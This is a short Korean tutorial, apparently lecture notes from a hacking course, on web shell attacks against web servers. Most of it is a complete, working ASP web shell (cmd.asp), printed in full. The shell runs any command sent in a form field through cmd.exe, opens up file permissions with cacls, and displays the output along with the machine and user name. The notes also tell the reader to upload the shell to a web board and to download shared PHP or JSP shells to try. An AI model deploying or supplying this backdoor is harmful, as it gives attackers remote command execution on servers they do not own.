네트워크 해킹 - 21. WEB shell Attack

WEB shell Attack

- 2012년까지 WEB 서버 공격에 많이 사용되던 공격 방식

- 명령 shell을 web page로 연결하여 출력 형태를 볼 수 있도록 하는 공격

- cmd.jsp, cmd.php, cmd.asp

- 원래 web서버의 중간 정도의 보안이 설정된 경우라면 동작되지 않음. 

>> 공격 방식에 대한 이해

-> 공격자가 web 게시판에 command shell을 띄울 수 있는 script를 upload 한다.

-> URI에 해당 파일로 직접 접근을 시도하면 명령 창이 생성 됨. 

WEB shell code
-------------------------------------------------------------------------------------
  <% 
   Dim oS,oSNet,oFSys, oF,szCMD, szTF
   On Error Resume Next
   Set oS = Server.CreateObject("WSCRIPT.SHELL")
   Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
   Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
   szCMD = Request.Form("C")

   If (szCMD <> "") Then
    szTF = "c:\windows\pchealth\" &  oFSys.GetTempName()
    ' Here we do the command
    Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF & """",0,True)
    response.write szTF
    ' Change perms
    Call oS.Run("win.com cmd.exe /c cacls.exe" & szTF & " /E /G everyone:F",0,True)
    Set oF = oFSys.OpenTextFile(szTF,1,False,0)
   End If 
   %>
   <FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
   <input type=text name="C" size=70 value="<%= szCMD %>">
   <input type=submit value="Run"></FORM><PRE>
    Machine: <%=oSNet.ComputerName%><BR>
    Username: <%=oSNet.UserName%><br>
   <% 
   If (IsObject(oF)) Then
    On Error Resume Next
    Response.Write Server.HTMLEncode(oF.ReadAll)
    oF.Close
    Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
   End If 
   %>
-----------------------------------------------------------------------------------------------
cmd.asp 이름으로 저장한 뒤 업로드 한다.

* 테스트용 코드로 인터넷 상에 공유가 되어 있고, 보안 등급이 낮은 WEB 서버에서는 작동이 되어 명령형 백도어로 부르기도 함. 

* WEB 공격 유형

1) URI 조작 및 권한 획득

2) Injection 공격 및 로그인/다른 테이블 정보 보기

3) cmd shell upload 공격 및 명령 권한 획득

      

* 확인해야 할 것들!

1. 웹페이지 어떤걸로 제작되었는지 먼저 확인해야함

2. 테스트용 코드가 인터넷 상에 공유되니 그것을 다운받아 사용해 보기

    ( .THP  .PHP  .ASP  .JSP   4가지로 코드가 많이 돌아다님)

    ex) cmdp.php    /   cmd.php

실습